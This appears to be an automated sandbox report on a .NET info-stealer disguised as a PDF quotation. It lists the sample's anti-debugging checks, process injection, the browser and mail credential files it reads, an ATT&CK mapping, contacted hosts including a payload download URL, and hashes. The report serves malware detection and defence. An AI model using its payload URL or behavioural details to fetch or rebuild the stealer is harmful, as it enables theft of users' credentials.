
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Code function: 0_2_02DB89F0 CheckRemoteDebuggerPresent,0_2_02DB89F0
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Process queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Process queried: DebugPort
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 43E000
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 440000
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: C91008
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Queries volume information: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe VolumeInformation
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: QUOTATION_JULQTRA071244#U00faPDF.scr.exe PID: 7612, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: aspnet_compiler.exe PID: 5584, type: MEMORYSTR
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.7b20000.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4cf9640.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.7b20000.15.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4ad1618.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4cf9640.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4ad1618.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1935701482.0000000007B20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1928437067.00000000069D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1919160150.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000002.2683739560.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: QUOTATION_JULQTRA071244#U00faPDF.scr.exe PID: 7612, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: aspnet_compiler.exe PID: 5584, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: QUOTATION_JULQTRA071244#U00faPDF.scr.exe PID: 7612, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: aspnet_compiler.exe PID: 5584, type: MEMORYSTR
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.7b20000.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4cf9640.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.7b20000.15.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4ad1618.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4cf9640.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.4ad1618.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1935701482.0000000007B20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1928437067.00000000069D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1919160150.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                    Execution: 231 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
                    Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                    Privilege Escalation: 211 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
                    Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 261 Virtualization/Sandbox Evasion; 211 Process Injection; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
                    Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                    Discovery: 531 Security Software Discovery; 1 Process Discovery; 261 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 34 System Information Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                    Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                    Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
                    Behavior Graph ID: 1467095, Sample: QUOTATION_JULQTRA071244#U00..., Startdate: 03/07/2024, Architecture: WINDOWS, Score: 100
                    DNS/IP: ip-api.com; s21.filetransfer.io; filetransfer.io
                    Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 11 other signatures
                    Process: QUOTATION_JULQTRA071244#U00faPDF.scr.exe (started)
                      DNS/IP: filetransfer.io, 188.114.96.3, 443, 49705, 49706, CLOUDFLARENETUS, European Union
                      Dropped file: QUOTATION_JULQTRA0...00faPDF.scr.exe.log, ASCII
                      Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes; Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Process: aspnet_compiler.exe (started)
                        DNS/IP: ip-api.com, 208.95.112.1, 49713, 80, TUT-ASUS, United States
                        Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 2 other signatures

                    Source | Detection | Scanner | Label
                    QUOTATION_JULQTRA071244#U00faPDF.scr.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
                    QUOTATION_JULQTRA071244#U00faPDF.scr.exe | 100% | Avira | HEUR/AGEN.1362232
                    QUOTATION_JULQTRA071244#U00faPDF.scr.exe | 100% | Joe Sandbox ML |
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label
                    https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe
                    https://account.dyn.com/ | 0% | URL Reputation | safe
                    https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe
                    https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe
                    http://ip-api.com | 0% | URL Reputation | safe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                    http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
                    https://s21.filetransfer.io | 0% | Avira URL Cloud | safe
                    https://github.com/mgravell/protobuf-neti | 0% | Avira URL Cloud | safe
                    https://github.com/mgravell/protobuf-netJ | 0% | Avira URL Cloud | safe
                    http://filetransfer.iod | 0% | Avira URL Cloud | safe
                    http://filetransfer.io/data-package/btd2ptah/download0C | 0% | Avira URL Cloud | safe
                    http://filetransfer.io/data-package/btd2ptah/download | 0% | Avira URL Cloud | safe
                    http://filetransfer.io | 0% | Avira URL Cloud | safe
                    https://github.com/mgravell/protobuf-net | 0% | Avira URL Cloud | safe
                    https://filetransfer.ioli | 0% | Avira URL Cloud | safe
                    https://filetransfer.io/data-package/btd2ptah/download | 0% | Avira URL Cloud | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    s21.filetransfer.io | 188.114.96.3 | true | false | | unknown
                    filetransfer.io | 188.114.96.3 | true | false | | unknown
                    ip-api.com | 208.95.112.1 | true | true | | unknown
                          Name | Malicious | Antivirus Detection | Reputation
                          https://filetransfer.io/data-package/btd2ptah/download | false | Avira URL Cloud: safe | unknown
                          http://filetransfer.io/data-package/btd2ptah/download | false | Avira URL Cloud: safe | unknown
                          http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
                          Name | Source | Malicious | Antivirus Detection | Reputation
                          https://github.com/mgravell/protobuf-neti | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          https://stackoverflow.com/q/14436606/23354 | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003281000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                          https://account.dyn.com/ | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                          https://github.com/mgravell/protobuf-netJ | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          http://filetransfer.io/data-package/btd2ptah/download0C | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003001000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          https://filetransfer.ioli | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003041000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          https://stackoverflow.com/q/11564914/23354; | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
                          https://stackoverflow.com/q/2152978/23354 | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
                          http://ip-api.com | aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                          http://filetransfer.iod | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003088000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          https://github.com/mgravell/protobuf-net | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          http://filetransfer.io | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003001000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003088000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003001000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                          https://s21.filetransfer.io | QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.000000000306F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          IP | Domain | Country | ASN | ASN Name | Malicious
                          208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
                          188.114.96.3 | s21.filetransfer.io | European Union | 13335 | CLOUDFLARENETUS | false
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1467095
                          Start date and time:2024-07-03 18:07:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 17s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          renamed because original name is a hash value
                          Original Sample Name:QUOTATION_JULQTRA071244PDF.scr.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 97%
                          • Number of executed functions: 240
                          • Number of non-executed functions: 18
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          Time | Type | Description
                          12:08:07 | API Interceptor | 33515x Sleep call for process: QUOTATION_JULQTRA071244#U00faPDF.scr.exe modified
                          Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                          No context
                          Process:C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1459
                          Entropy (8bit):5.357867833060924
                          Encrypted:false
                          SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeRE4Kx1qE4qpsXE4qdKm:MxHKlYHKh3owH8tHo6hAHKzeRHKx1qHW
                          MD5:A773BB5737D2A64BDB410F2E8FB75AE4
                          SHA1:376EEAB4713E33649D2173B61BB04E0783E26AE0
                          SHA-256:C1A11C048FF076862518318A5F07D95CFA07AE8B23552DA5CF627AA7A023CCF5
                          SHA-512:66E6C2A97ABC2481F330676B5AB195BB5CD6DC2A0726C4109ED95EA3561E73DD345F8C87994132E985CC19A8CDD8FC9CEE290B88415F5D9AA21591F65B6893C8
                          Malicious:true
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):4.791974145158844
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          File name:QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          File size:968'192 bytes
                          MD5:f0a33bc19a7edfa50259138ceae8c2ef
                          SHA1:23502ba3d4862040181f3484c7a07fd514b7e4d0
                          SHA256:49c758a7ea0cb8c7320183804f885757f60c5979be2e5fb9e6fa9db40498939b
                          SHA512:2461d4b9a34a5a6987b32e89eda77fb59d7f5fc3acf530cb6b4d43550ab0584aca869be99e0f238a45350c608b4d887f0f338fb24641b1d6dcf298dcc99350f4
                          SSDEEP:12288:DrBd2FoHyMnIeQGZ9thag5VdTei0l0VlYDGBn0TK34TDO3AXd:iFeyMXzTeigsa4O
                          TLSH:D725940A76E6B2A1D558D736D6E71800C362DEC7B29FD28E258A33A955727BF4F03043
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'..f................................. ........@.. ....................... ............`................................
                          Icon Hash:0e3333b0bbb3b035
                          Entrypoint:0x49c42e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6683C227 [Tue Jul 2 09:02:31 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
